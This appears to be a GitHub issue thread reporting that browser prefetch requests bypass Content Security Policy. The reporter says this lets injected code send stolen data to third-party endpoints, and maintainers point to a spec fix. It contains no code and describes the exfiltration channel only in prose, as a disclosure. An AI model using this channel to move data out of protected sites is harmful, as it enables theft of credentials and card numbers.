This repository was archived by the owner on Jun 30, 2023. It is now read-only.
Why is prefetching ignoring CSP and allowing connections to 3rd party destinations? #73
Comments
|
Correct behavior here is being discussed in w3c/webappsec-csp#107 Once the right behavior is decided, we'll indeed need to fix the relevant specs and implementations will need to align. |
|
The discussions were concluded and prefetch needs to be subject to |
Sign up for free
to subscribe to this conversation on GitHub.
Already have an account?
Sign in.
Since i can send (and i tested this in Chromium 63) prefetch requests formed to my liking to any site, an attacker can send stolen (by other means, e.g. a malicious npm packages, injected code) information to his receiving endpoint, which obviously opens doors to many bad attack situations.
How do you plan to mitigate this? Apparently all the benefits of CSP are mulled by this behaviour.
For a rough PoC and more explanations, see here:
https://hackernoon.com/im-harvesting-credit-card-numbers-and-passwords-from-your-site-here-s-how-9a8cb347c5b5
(I sure hope the guy isn't doing this, as claimed. But reddit correctly states: if he isn't doing it, someone else now surely started)
Greetings,
@Hackerfleet - @ri0t
Edit: This maybe just a bug in chrome, i'd restate the issue on the according bugtrackers, if you think so, too. Firefox is - as far as i can tell - not affected by this.
The text was updated successfully, but these errors were encountered: